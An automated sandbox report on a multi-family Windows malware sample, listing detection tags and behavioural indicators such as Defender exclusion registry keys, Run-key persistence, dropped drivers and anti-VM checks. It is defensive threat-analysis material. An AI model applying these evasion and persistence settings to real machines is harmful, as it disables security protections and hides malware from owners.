Malware Analysis Report

2025-08-10 17:39

Sample ID 230625-mhek7aeg3z
Target fileexe.exe
SHA256 5aad31095b0b9a429fed8773a233eb872868467d33f52b9d6f6e7fa078092011
Tags
amadey fabookie gcleaner glupteba smokeloader xmrig up3 backdoor discovery dropper evasion loader miner persistence rootkit spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5aad31095b0b9a429fed8773a233eb872868467d33f52b9d6f6e7fa078092011

Threat Level: Known bad

The file fileexe.exe was found to be: Known bad.

Malicious Activity Summary

amadey fabookie gcleaner glupteba smokeloader xmrig up3 backdoor discovery dropper evasion loader miner persistence rootkit spyware stealer trojan upx

Glupteba payload

Glupteba

GCleaner

xmrig

Amadey

Detect Fabookie payload

Fabookie

Modifies security service

SmokeLoader

Suspicious use of NtCreateUserProcessOtherParentProcess

Windows security bypass

XMRig Miner payload

Modifies boot configuration data using bcdedit

Stops running service(s)

Possible attempt to disable PatchGuard

Modifies Windows Firewall

Downloads MZ/PE file

Drops file in Drivers directory

Loads dropped DLL

Reads user/profile data of web browsers

Windows security modification

UPX packed file

Executes dropped EXE

Checks computer location settings

Adds Run key to start application

Manipulates WinMon driver.

Manipulates WinMonFS driver.

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in System32 directory

Checks for VirtualBox DLLs, possible anti-VM trick

Launches sc.exe

Drops file in Windows directory

Drops file in Program Files directory

Program crash

Unsigned PE

Enumerates physical storage devices

Detects videocard installed

Modifies system certificate store

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Creates scheduled task(s)

Modifies data under HKEY_USERS

Kills process with taskkill

Suspicious behavior: LoadsDriver

Suspicious behavior: MapViewOfSection

Suspicious use of FindShellTrayWindow

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-06-25 10:27

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-06-25 10:27

Reported

2023-06-25 10:30

Platform

win7-20230621-en

Max time kernel

146s

Max time network

148s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

GCleaner

loader gcleaner

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies security service

evasion
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters C:\Windows\System32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security C:\Windows\System32\reg.exe N/A

SmokeLoader

trojan backdoor smokeloader

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3eef203fb515bda85f514e168abb5973.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\system32\taskeng.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3eef203fb515bda85f514e168abb5973.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3297628651-743815474-1126733160-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3297628651-743815474-1126733160-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Manipulates WinMon driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMon C:\Windows\rss\csrss.exe N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1168 set thread context of 772 N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe
PID 1608 set thread context of 1968 N/A C:\Program Files\Notepad\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 1608 set thread context of 1560 N/A C:\Program Files\Notepad\Chrome\updater.exe C:\Windows\System32\conhost.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Notepad\Chrome\updater.exe N/A
File created C:\Program Files\Google\Libs\g.log C:\Windows\System32\cmd.exe N/A
File created C:\Program Files\Google\Libs\g.log C:\Windows\System32\cmd.exe N/A
File created C:\Program Files\Notepad\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
File created C:\Windows\Logs\CBS\CbsPersist_20230625102804.cab C:\Windows\system32\makecab.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-392 = "Arab Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-171 = "Central Daylight Time (Mexico)" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-461 = "Afghanistan Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-402 = "Arabic Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-722 = "Central Pacific Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-752 = "Tonga Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-651 = "AUS Central Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-741 = "New Zealand Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-451 = "Caucasus Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-365 = "Middle East Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-831 = "SA Eastern Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-721 = "Central Pacific Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-961 = "Paraguay Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-191 = "Mountain Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1022 = "Bangladesh Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-222 = "Alaskan Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-141 = "Canada Central Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-372 = "Jerusalem Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-262 = "GMT Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-301 = "Romance Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-51 = "Greenland Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-212 = "Pacific Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-751 = "Tonga Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-872 = "Pakistan Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-592 = "Malay Peninsula Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Windows\windefender.exe N/A
